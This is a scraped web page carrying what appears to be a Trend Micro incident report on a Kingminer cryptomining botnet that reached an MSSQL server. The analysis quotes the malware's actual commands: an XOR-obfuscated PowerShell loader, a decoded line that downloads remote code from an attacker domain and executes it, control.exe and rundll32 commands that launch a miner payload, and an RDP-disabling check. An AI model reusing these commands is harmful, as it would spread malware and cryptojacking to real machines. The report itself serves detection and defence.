Uncovering a Kingminer Botnet Attack Using Trend Micro Managed XDR<\/title> <link href=\"https:\/\/fonts.googleapis.com\/css?family=Open+Sans:300,300i,400,400i,600\" rel=\"stylesheet\">\n<link href=\"\/\/customer.cludo.com\/css\/296\/1798\/cludo-search.min.css\" type=\"text\/css\" rel=\"stylesheet\"> <link rel=\"stylesheet\" href=\"\/etc.clientlibs\/trendresearch\/clientlibs\/clientlib-trendresearch.min.css\" type=\"text\/css\"> <meta property=\"og:url\" content=\"https:\/\/www.trendmicro.com\/en_us\/research\/22\/e\/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-x.html\"><br \/>\n<meta property=\"og:title\" content=\"Uncovering a Kingminer Botnet Attack Using Trend Micro Managed XDR\"><br \/>\n<meta property=\"og:site_name\" content=\"Trend Micro\"><br \/>\n<meta property=\"og:image\" content=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/22\/e\/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-xdr\/KingminerThumbResized.jpg\"><br \/>\n<meta property=\"og:locale\" content=\"en_US\"> <meta name=\"twitter:card\" content=\"summary_large_image\"><br \/>\n<meta name=\"twitter:site\" content=\"@TrendMicro\"><br \/>\n<meta name=\"twitter:title\" content=\"Uncovering a Kingminer Botnet Attack Using Trend Micro Managed XDR\"><br \/>\n<meta name=\"twitter:image\" content=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/22\/e\/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-xdr\/KingminerThumbResized.jpg\"> <\/head> <body class=\"articlepage page basicpage context-business\" id=\"readabilityBody\" readability=\"50.561998215879\">  <a id=\"page-scroll\" title=\"VerticalPageScroll\" href=\"javascript:jumpScroll($(this).scrollTop());\"> <span class=\"icon-chevron-up\"><\/span> <\/a>  <\/p>\n<div class=\"root responsivegrid\">\n<div class=\"aem-Grid aem-Grid--12 aem-Grid--default--12 \">\n<div class=\"articleBodyNoHero aem-GridColumn aem-GridColumn--default--12\">\n<div class=\"research-layout article container\" role=\"contentinfo\">\n<article class=\"research-layout--wrapper row\" data-article-pageid=\"534182057\">\n<div class=\"col-xs-12 col-md-12 one-column\">\n<div class=\"col-xs-12 col-md-12\" readability=\"8.2579113924051\">\n<div class=\"article-details\" role=\"heading\" readability=\"35.946202531646\"> <span class=\"article-details__bar\" role=\"img\"><\/span> <\/p>\n<p class=\"article-details__description\">Trend Micro\u2019s Managed XDR team addressed a Kingminer botnet attack conducted through an SQL exploit. We discuss our findings and analysis in this report.<\/p>\n<p class=\"article-details__author-by\">By: Buddy Tancio, Jed Valderama <time class=\"article-details__date\">May 18, 2022<\/time> <span>Read time: <\/span><span class=\"eta\"><\/span> (<span class=\"words\"><\/span> words) <\/p>\n<\/p><\/div>\n<\/p><\/div>\n<\/p><\/div>\n<hr class=\"research-layout-divider\"> <main class=\"main--content col-xs-12 col-md-8 col-md-push-2\"> <\/p>\n<div class=\"richText\" readability=\"35.775862068966\">\n<div readability=\"19.080459770115\">\n<p>We observed malicious activities in a client\u2019s SQL server that flagged a potential exploit in one public-facing device. A quick look at the Trend Micro Vision One\u2122 Workbench showed that a Microsoft SQL server process created an obfuscated <a href=\"https:\/\/www.trendmicro.com\/vinfo\/ph\/security\/news\/cybercrime-and-digital-threats\/tracking-detecting-and-thwarting-powershell-based-malware-and-attacks\" target=\"_self\" rel=\"noopener\">PowerShell<\/a> command. This suggested that the machine had been compromised, prompting us to investigate further.<\/p>\n<p>The tactics, techniques, and procedures (TTPs) discussed here reflect many of the TTPs that threat researchers have identified with the Kingminer botnet. According to <a href=\"https:\/\/www.bankinfosecurity.com\/kingminer-botnet-targeting-sql-servers-for-cryptomining-a-14412\" target=\"_blank\" rel=\"noopener\">reports<\/a> in mid-2020, malicious actors deployed Kingminer to target SQL servers for cryptocurrency mining. Threat analysts have also documented <a href=\"https:\/\/www.zdnet.com\/article\/kingminer-cryptojacker-returns-now-new-and-improved\/\" target=\"_blank\" rel=\"noopener\">known activities<\/a> of the Kingminer botnet operators in November 2018 and their <a href=\"https:\/\/blog.360totalsecurity.com\/en\/weak-password-was-blasted-again-kingminer-mining-new-trojan-variant-online\/\" target=\"_blank\" rel=\"noopener\">reemergence<\/a> in July 2019. Our recent detections therefore suggest the apparent resurgence of the malware that exploits systems with known, unpatched vulnerabilities. We discuss our findings in the following section.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/22\/e\/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-xdr\/kingminer01.png\" alt=\"Figure 1. Trend Micro Vision One Workbench detection for the malicious SQL activity\"><figcaption>Figure 1. Trend Micro Vision One Workbench detection for the malicious SQL activity<\/figcaption><\/figure>\n<\/p><\/div>\n<div>\n<div class=\"richText\" readability=\"31.505952380952\">\n<div readability=\"11.285714285714\">\n<p><b>Investigation and analysis<\/b><\/p>\n<p>We observed a <a href=\"https:\/\/www.techopedia.com\/definition\/22809\/visual-basic-script-vbscript\" target=\"_blank\" rel=\"noopener\">VBScript<\/a> file named %PUBLIC%\\gfghhjhyuq.vbs executed through <a href=\"https:\/\/docs.microsoft.com\/en-us\/sql\/tools\/sqlservr-application?view=sql-server-ver15\" target=\"_blank\" rel=\"noopener\">sqlservr.exe<\/a>. This led us to suspect that the device had been exploited through a vulnerability that allowed malicious actors to execute arbitrary codes remotely. The sqlservr process handles the requests received by an MSSQL database<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/22\/e\/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-xdr\/kingminer02.png\" alt=\"Figure 2. Trend Micro Vision One\u2122 execution profile of sqlservr.exe using PowerShell to run gfghhjhyuq.vbs\"><figcaption>Figure 2. Trend Micro Vision One\u2122 execution profile of sqlservr.exe using PowerShell to run gfghhjhyuq.vbs<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"33.768181818182\">\n<div readability=\"12.911363636364\">\n<p>We collected the gfghhjhyuq.vbs file using Trend Micro Vision One to probe further. Despite the script being obfuscated, we were able to uncover most of its functions by decoding the hex string parameters. We describe the chain of events in the following section.<\/p>\n<p>The file first checks for the operating system version through a <a href=\"https:\/\/docs.microsoft.com\/en-us\/windows\/win32\/wmisdk\/wmi-start-page\" target=\"_blank\" rel=\"noopener\">WMI<\/a> object. It then proceeds to download a 32-bit or 64-bit payload depending on the installed Windows version.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/22\/e\/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-xdr\/kingminer03------------------------gtc.jpg\" alt=\"Figure 3. Partially decoded gfghhjhyuq.vbs used to check the operating system version through a WMI object\"><figcaption>Figure 3. Partially decoded gfghhjhyuq.vbs used to check the operating system version through a WMI object<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"32.5\">\n<div readability=\"10\">\n<p>Next, it downloads a standalone PowerShell binary from a raw file stored in a GitHub user\u2019s repository. Afterward, it saves and executes it as %PUBLIC%\\{timestamp}\\sysdo.exe.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/22\/e\/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-xdr\/Kingminer04.jpg\" alt=\" Figure 4. Downloading of 32-bit or 64-bit PowerShell binary from a GitHub repository\"><figcaption> Figure 4. Downloading of 32-bit or 64-bit PowerShell binary from a GitHub repository<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/22\/e\/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-xdr\/kingminer05.jpg\" alt=\"Figure 5. PowerShell binary copied as sysdo.exe and executed\"><figcaption>Figure 5. PowerShell binary copied as sysdo.exe and executed<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"28.556962025316\">\n<div readability=\"8.0316455696203\">\n<p>Following this, it generates the URL where additional PowerShell scripts will be downloaded. The scripts are then executed filelessly using <a href=\"https:\/\/docs.microsoft.com\/en-us\/powershell\/module\/microsoft.powershell.utility\/invoke-expression?view=powershell-7.2\" target=\"_blank\" rel=\"noopener\">Invoke-Expression<\/a>.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/22\/e\/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-xdr\/kingminer06.jpg\" alt=\"Figure 6. Generating URLs for download and fileless execution of additional PowerShell scripts\"><figcaption>Figure 6. Generating URLs for download and fileless execution of additional PowerShell scripts<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"31.5\">\n<div readability=\"8\">\n<p>Finally, it runs a cryptocurrency miner payload through a Control Panel item.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/22\/e\/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-xdr\/kingminer07.jpg\" alt=\"Figure 7. Execution of cryptocurrency miner through a Control Panel item\"><figcaption>Figure 7. Execution of cryptocurrency miner through a Control Panel item<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"32.5\">\n<div readability=\"10\">\n<p>Security teams can clearly see and monitor the chain of events in Vision One. After the cryptocurrency miner is executed through the Control Panel item, sqlservr.exe calls C:\\Windows\\Temp\\sysdo.exe (renamed as PowerShell binary).<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/22\/e\/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-xdr\/kingminer08.png\" alt=\"Figure 8. Sysdo.exe (renamed as a PowerShell binary) executing the following obfuscated commands directly to memory, detected as Trojan.PS1.MALXMR.PFAIS\"><figcaption>Figure 8. Sysdo.exe (renamed as a PowerShell binary) executing the following obfuscated commands directly to memory, detected as Trojan.PS1.MALXMR.PFAIS<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"36.184835402051\">\n<div readability=\"17.844576362655\">\n<blockquote><p><i>“C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe” -c “$p=’b3f8b7aab7d9f2e0bad8f5fdf2f4e3b7bad4f8fad8f5fdf2f4e3b7dae4effafba5b9cfdadbdfc3c3c7acb3f8b9d8e7f2f9bfb0d0d2c3b0bbb0ffe3e3e7adb8b8e0e0b9a4a6a6a4f4f1f3f6f2b9f4f8fab8f2f5b9e3efe3b0bbb7b3d1f6fbe4f2beacb3f8b9c4f2f9f3bfbeacb3e7aab3f8b9e5f2e4e7f8f9e4f2c3f2efe3acccc4eee4e3f2fab9c3f2efe3b9d2f9f4f8f3fef9f0caadadd6e4f4fefeb9d0f2e3c4e3e5fef9f0bfccd4f8f9e1f2e5e3caadadd1e5f8fad5f6e4f2a1a3c4e3e5fef9f0bfb3e7bebeebb1bfd0d6dbb7debdcfbeacf9f2feb7b7bac7d2c7f6e3ffb7f1f1f1f1b7baf9fef4b7e3fc’;$p = for($i=0; $i -lt $p.length; $i+=2){[char](([byte][char][int]::Parse($p.substring($i,2),’HexNumber’)) -bxor 151)};$p=(-join $p) -join ‘ ‘;$p|&(GAL I*X)”<\/i><\/p><\/blockquote>\n<p>Upon checking the Windows Antimalware Scan Interface (AMSI) telemetry through Vision One, we saw the decoded PowerShell command lines. These connect to http:\/\/ww[.]3113cfdae.com\/eb[.]txt th<\/p>\n<blockquote><p><i>$o = New-Object -ComObject Msxml2.XMLHTTP;$o.Open(‘GET’,’http:\/\/ww.3113cfdae.com\/eb.txt’, $False);$o.Send();$p<\/i><\/p><\/blockquote>\n<blockquote><p><i>=$o.responseText;[System.Text.Encoding]::Ascii.GetString([Convert]::FromBase64String($p))|&(GAL I*X);nei -PEP<\/i><\/p><\/blockquote>\n<blockquote><p><i>ath ffff -nic tk<\/i><\/p><\/blockquote>\n<p>Similar to what we saw in our analysis of the file gfghhjhyuq.vbs script, it has also been observed through Vision One that sysdo.exe invoked <a href=\"https:\/\/answers.microsoft.com\/en-us\/windows\/forum\/all\/what-is-rundll32exe\/5f707fc5-d78b-4cdd-a5d0-bb0c4b80c3a8\" target=\"_blank\" rel=\"noopener\">rundll32<\/a> using a <a href=\"https:\/\/support.microsoft.com\/en-us\/topic\/description-of-control-panel-cpl-files-4dc809cd-5063-6c6d-3bee-d3f18b2e0176\" target=\"_blank\" rel=\"noopener\">main.cpl<\/a>, which is a Microsoft Module for the functionality of the mouse. The malicious actor used this module to launch the payload directly onto the device\u2019s memory that connects to known malicious domain, http:\/\/qqqe[.]1eaba4fdae[.]com, to download additional components.<\/p>\n<blockquote><p><i>“C:\\Windows\\System32\\control.exe” “C:\\Windows\\system32\\main.cpl” -QmDvMERT99 http:\/\/qqqe.1eaba4fdae.com\/ -ming day2 -PRHVoCqZ99<\/i><\/p><\/blockquote>\n<blockquote><p><i>“C:\\Windows\\system32\\rundll32.exe” Shell32.dll,Control_RunDLL “C:\\Windows\\system32\\main.cpl” -QmDvMERT99 http:\/\/qqqe.1eaba4fdae.com\/ -ming day2 -PRHVoCqZ99I*X)”<\/i><\/p><\/blockquote><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/22\/e\/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-xdr\/kingminer09.png\" alt=\"Figure 9. Process tree of Control Panel item execution as seen in the Vision One console\"><figcaption>Figure 9. Process tree of Control Panel item execution as seen in the Vision One console<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"37.117602996255\">\n<div readability=\"20.512359550562\">\n<p>We noticed additional PowerShell executions spawned by sqlservr.exe. These were executed by the previously dropped sysdo.exe file. There are two commands here: One checks if the installed version of Windows is from Windows 2000 to Windows 7. Secondly, it checks separately if hotfixes <a href=\"https:\/\/trendmicro-my.sharepoint.com\/personal\/louiseabigail_payuyo_trendmicro_com\/Documents\/Desktop\/1KingMiner\/Capitalize%20KB,%20link%20here:%20https:\/support.microsoft.com\/en-us\/topic\/may-14-2019-kb4499175-security-only-update-4633b67f-f683-7731-f332-e1e7ec35bfc5\" target=\"_blank\" rel=\"noopener\">KB4499175<\/a> (Windows 7 SP1) and <a href=\"https:\/\/support.microsoft.com\/en-us\/topic\/description-of-the-security-update-for-the-remote-code-execution-vulnerability-in-windows-xp-sp3-windows-server-2003-sp2-windows-server-2003-sp2-r2-windows-xp-professional-x64-edition-sp2-windows-xp-embedded-sp3-\" target=\"_blank\" rel=\"noopener\">KB4500331<\/a> (Windows XP, Windows Server 2003 SP2) are installed. If it finds that none of the hotfixes is present, this means that it is vulnerable to the BlueKeep vulnerability assigned as <a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/cve-2019-0708\" target=\"_blank\" rel=\"noopener\">CVE-2019-0708<\/a>. If both commands yield negative results, the script disables RDP and the cryptocurrency miner proceeds to its infection routine.<\/p>\n<blockquote><p><i>“C:\\Windows\\system32\\cmd.exe” \/c cmd \/c ver |findstr “5.0 5.1 5.2 6.0 6.1″&&wmic qfe GET hotfixid |findstr \/i “kb4499175 kb4500331″||wmic RDTOGGLE WHERE ServerName=’%COMPUTERNAME%’ call SetAllowTSConnections 0<\/i><\/p><\/blockquote>\n<blockquote><p><i>“C:\\Windows\\System32\\cmd.exe” \/c ver |findstr “5.0 5.1 5.2 6.0 6.1″&&wmic qfe GET hotfixid |findstr \/i “kb4499175 kb4500331″||wmic RDTOGGLE WHERE ServerName=’HELPDESK’ call SetAllowTSConnections 0<\/i><\/p><\/blockquote>\n<p><b>Discovering vulnerabilities<\/b><\/p>\n<p>Using a search engine for internet of things (IoT) devices like Shodan and Censys, the team was able to both see exposed services such as RDP and SQL and validate missing patches on any machine. One of the vulnerabilities we found traces back to 2014. <\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/22\/e\/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-xdr\/kingminer10.png\" alt=\"Figure 10. Vulnerability found through a Shodan scan on any public-facing machine\"><figcaption>Figure 10. Vulnerability found through a Shodan scan on any public-facing machine<\/figcaption><\/figure>\n<\/p><\/div>\n<div class=\"richText\" readability=\"41.613263785395\">\n<div readability=\"29.374068554396\">\n<p>Notably, after we detected fgfghhjhyuq.vbs (detected as Trojan.VBS.MALXMR.AS), we continued to observe more attempts to drop malware on the same server. It\u2019s important to note that although the malicious actor was unable to execute the malware, such attempts did not stop since the malware was still there. Only after the vulnerability was patched did the attempts cease.<\/p>\n<p><b>Conclusion and security recommendations<\/b><\/p>\n<p>While measures for signature detection are in place to shield an organization\u2019s network from breaches, security teams should still prioritize the identification of vulnerabilities on their servers and endpoints and make sure that these are immediately patched. Doing so is even more crucial for public-facing systems. Adopting a proactive cybersecurity mindset is essential for an organization to thrive as the conduct of business in the digital space deepens and grows.<\/p>\n<p>It is recommended that organizations deploy intrusion detection systems such as <a href=\"https:\/\/www.trendmicro.com\/en_us\/business\/products\/network\/advanced-threat-protection\/inspector.html\" target=\"_blank\" rel=\"noopener\">Trend Micro\u2122 Deep Discovery\u2122 Inspector<\/a>) as a preventive measure. This is relevant to the case discussed here. Since we did not have network-level visibility, we only relied on endpoint-level data to investigate and respond to the threat. Implementing network monitoring allows security professionals to detect specific server-related vulnerabilities that the malicious actors might abuse, in addition to being able to scope out all affected machines on the network. A reliable intrusion detection system would also be a useful tool for monitoring and investigating ongoing attacks since it can provide historical logs of activities in an organization\u2019s network.<\/p>\n<p><b>Indicators of compromise (IOCs)<\/b><\/p>\n<table cellpadding=\"1\" cellspacing=\"0\" border=\"1\">\n<tbody readability=\"2\">\n<tr>\n<td><b>SHA256<\/b><\/td>\n<td><b>Detection Name<\/b><\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>0CF6882D750EEA945A9B239DFEAC39F65EFD91B3D0811159707F1CEC6CD80CC0<\/td>\n<td>Trojan.VBS.MALXMR.AS<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td>CB29887A45AEA646D08FA16B67A24848D8811A5F2A18426C77BEAAE9A0B14B86<\/td>\n<td>Trojan.PS1.MALXMR.PFAIS<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<ul>\n<li> <span class=\"rte-red-bullet\">hxxp:\/\/ww.3113cfdae.com\/eb[.]txt, detected as Dangerous (Disease Vector)<\/span><\/li>\n<li><span class=\"rte-red-bullet\"> hxxp:\/\/qqqe.1eaba4fdae[.]com\/, detected as Dangerous (Disease Vec<\/span>tor)<\/li>\n<\/ul><\/div>\n<\/p><\/div>\n<\/p><\/div>\n<section class=\"tag--list\">\n<p>Tags<\/p>\n<\/section>\n<p> <\/main> <\/article>\n<\/div>\n<\/div><\/div>\n<\/div>\n<p>   <\/p>\n<p> <span>sXpIBdPeKzI9PC2p0SWMpUSM2NSxWzPyXTMLlbXmYa0R20xk<\/span> <\/p>\n<p>   <\/body> Read More <a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/22\/e\/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-x.html\">HERE<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Trend Micro\u2019s Managed XDR team addressed a Kingminer botnet attack conducted through an SQL exploit. We discuss our findings and analysis in this report. Read More HERE…<\/p>\n","protected":false},"author":2,"featured_media":46702,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"colormag_page_layout":"default_layout","footnotes":""},"categories":[61],"tags":[9510,9508,9555,9509],"class_list":["post-46701","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-trendmicro","tag-trend-micro-research-articles-news-reports","tag-trend-micro-research-endpoints","tag-trend-micro-research-exploitsvulnerabilities","tag-trend-micro-research-research"],"yoast_head":"\n<title>Uncovering a Kingminer Botnet Attack Using Trend Micro\u2122 Managed XDR 2026 | ThreatsHub Cybersecurity News<\/title>\n<meta name=\"description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.threatshub.org\/blog\/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-xdr\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Uncovering a Kingminer Botnet Attack Using Trend Micro\u2122 Managed XDR 2026 | ThreatsHub Cybersecurity News\" \/>\n<meta property=\"og:description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.threatshub.org\/blog\/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-xdr\/\" \/>\n<meta property=\"og:site_name\" content=\"ThreatsHub Cybersecurity News\" \/>\n<meta property=\"article:published_time\" content=\"2022-05-18T00:00:00+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/22\/e\/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-xdr\/KingminerThumbResized.jpg\" \/>\n<meta name=\"author\" content=\"TH Author\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@threatshub\" \/>\n<meta name=\"twitter:site\" content=\"@threatshub\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"TH Author\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"7 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-xdr\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-xdr\\\/\"},\"author\":{\"name\":\"TH Author\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\"},\"headline\":\"Uncovering a Kingminer Botnet Attack Using Trend Micro\u2122 Managed XDR\",\"datePublished\":\"2022-05-18T00:00:00+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-xdr\\\/\"},\"wordCount\":1464,\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-xdr\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2022\\\/05\\\/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-xdr.png\",\"keywords\":[\"Trend Micro Research : Articles, News, Reports\",\"Trend Micro Research : Endpoints\",\"Trend Micro Research : Exploits&Vulnerabilities\",\"Trend Micro Research : Research\"],\"articleSection\":[\"TrendMicro\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-xdr\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-xdr\\\/\",\"name\":\"Uncovering a Kingminer Botnet Attack Using Trend Micro\u2122 Managed XDR 2026 | ThreatsHub Cybersecurity News\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-xdr\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-xdr\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2022\\\/05\\\/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-xdr.png\",\"datePublished\":\"2022-05-18T00:00:00+00:00\",\"description\":\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-xdr\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-xdr\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-xdr\\\/#primaryimage\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2022\\\/05\\\/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-xdr.png\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2022\\\/05\\\/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-xdr.png\",\"width\":706,\"height\":520},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-xdr\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Trend Micro Research : Articles, News, Reports\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/tag\\\/trend-micro-research-articles-news-reports\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Uncovering a Kingminer Botnet Attack Using Trend Micro\u2122 Managed XDR\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"name\":\"ThreatsHub Cybersecurity News\",\"description\":\"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence 